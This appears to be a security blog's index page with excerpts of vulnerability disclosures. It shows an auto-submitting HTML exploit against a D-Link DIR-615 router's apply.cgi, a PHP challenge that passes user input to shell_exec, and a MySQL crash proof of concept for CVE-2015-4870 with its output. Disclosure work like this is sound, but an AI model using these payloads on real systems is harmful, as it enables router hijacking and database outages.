D-Link DIR-615 Open Redirection and XSS

D-Link DIR-615
Hardware Version: E3
Firmware Version: 5.10

The ‘apply.cgi’ file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in ‘apply.cgi’. For example the ‘ping_response.cgi’ file.

Open Redirection

apply.cgi

<html>
<!-- @OsandaMalith -->
  <body>
    <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
      <input type="hidden" name="html_response_page" value="https://google.lk" />
      <input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
    <img src=x onerror="exploit.submit()"/>
    </form>
  </body>
</html>

(more…)

Advertisements

PHP Feature or 0day?

Today one of my friends @RakeshMane10 gave me a challenge which I found pretty interesting.

&lt;?php
ini_set('error_displays', 0);
 $ip = htmlspecialchars($_GET['url'], ENT_QUOTES);
 $f = fsockopen($ip, 80, $errno, $errstr, 5);
 if($f) {
 	$result = shell_exec('ping -c 1 ' . $ip);
 	echo '&lt;div class=&quot;alert alert-success&quot;&gt;' . nl2br($result) . '&lt;/div&gt;';
} else {
 	echo '&lt;div class=&quot;alert alert-danger&quot;&gt;' .$errstr . '&lt;/div&gt;';
 }
?&gt;

(more…)

Storing a EXE inside MySQL

It’s possible to store a EXE file inside a MySQL database. You can try this out. For demonstration purposes I’m running MySQL in my localhost. I will be creating a simple database and a table big enough to store the exe file. Since we convert the exe to a hex file the content would be larger than the original exe file. I will be using ‘putty.exe’ as the binary.

CREATE DATABASE testupload;

USE testupload

CREATE TABLE uploads (
 id INT(3) NOT NULL AUTO_INCREMENT,
 name VARCHAR(1000000) NOT NULL,
 PRIMARY KEY (id)
 );

(more…)

MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

This is a crash I found in MySQL versions up to 5.5.45. In the function procedure analyse() I found this crash while passing a sub query.

Syntax:

 
SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);

So an Example POC would be:

 
select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
 
---------------------------------------------------------------------------------------------------------------
mysql&gt; select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql&gt;
mysql&gt; select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server

mysql&gt;
---------------------------------------------------------------------------------------------------------------

View post on imgur.com


(more…)

My Journey into eWPT

Last year I thought of getting certified in the field of web application security since I haven’t done any certifications before. I researched about the current certifications in the market and found out most of them are just answering few MCQs and getting certified, but unfortunately those are highly accepted by different organizations. But when it comes to the info sec industry there’s a bunch of good certifications I had in mind to complete someday. So considering my budget, time and resources I thought of taking eLearnSecurity’s eWPT certification. This certification is highly hands-on and a fully practical penetration test based exam. When it comes to the industry it’s hard to prove we know something, so I think I did a better choice in taking a certification in the field which I have experience since small age. Apart from that before I loose my teens I wanted to get certified 😉
(more…)